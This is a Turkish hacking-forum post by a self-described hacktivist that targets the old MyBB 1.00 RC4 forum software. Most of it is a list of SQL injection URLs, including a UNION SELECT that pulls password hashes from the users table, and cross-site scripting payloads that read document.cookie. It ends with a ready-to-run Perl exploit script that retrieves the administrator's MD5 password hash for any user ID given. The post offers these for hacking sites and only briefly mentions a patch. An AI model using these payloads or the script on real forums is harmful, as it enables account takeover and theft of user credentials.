Konuyu Oyla:
  • Toplam: 4 Oy - Ortalama: 2.75
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: MyBB 1.00 RC4 Forum newreply.php?tid= CSRF ve SQL Açıkları
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 54 / 100
Rep Sayısı: 2722
Mesaj Sayısı: 6201
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
MyBB 1.00 RC4 Forum newreply.php?tid= CSRF ve SQL Açıkları
01.10.2014 11:32
Kod:
http://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20​mybb_users/*
http://www.example.com/mybb/online.php?pidsql=)[sql_query]
http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
http://www.example.com/mybb/editpost.php?pid='[sql_query]
http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
http://www.example.com/mybb/newreply.php?tid='[sql_query]
http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
http://www.example.com/mybb/showthread.php?tid='[sql_query]
http://www.example.com/mybb/showthread.php?pid='[sql_query]
http://www.example.com/mybb/usercp2.php?tid='[sql_query]
http://www.example.com/mybb/printthread.php?tid='[sql_query]
http://www.example.com/mybb/reputation.php?pid='[sql_query]
http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
http://www.example.com/mybb/ratethread.php?tid='[sql_query]

http://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E

Kaynak =>
Kod:
http://www.securityfocus.com/bid/13827/exploit

Kod:
Merhaba Cyberizm ben KingSkrupellos. Bugünlerde üzerinde durduğum sürümlerden olan MyBB açıklarından biraz bahsetmek istedim. Türkçesini bulamayacağınız genelde piyasada ingilizce olan, ama bizim Türklerin pek anlamadığı için ben bunu Türkçe anlatmaya karar verdim açıkçası. Neyse başlıyalım.MyBB forum sitelerinde newreply.php?tid= ve calendar kısmında CSRF ve SQL Enjeksiyon hatası tespit edilmiştir. Açık hack'e giden apaçık bir yoldur. Nedeni ise aslında yukarıda verdiğim dosyalardan sql ve csrf hatalarından kaynaklanıyor. Mesela http://www.HERHANGİBİRSİTE.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20​mybb_users/* denildiğinde yetkili kullanıcı olan yöneticinin MD5'li şifresini ele geçirmiş oluyoruz. Patch'ini http://www.mybboard.com/ sitesinden temin edebilirsiniz.
Exploit Perl Kodu =>

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= KingSkrupellos Cyberizm.Org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0
http://www.HERHANGİBİRSİTE.com/mybb/ 1\n";
   exit(0);
}

$url =
"calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,n
ull,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print
"[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
Alinti



1 Ziyaretçi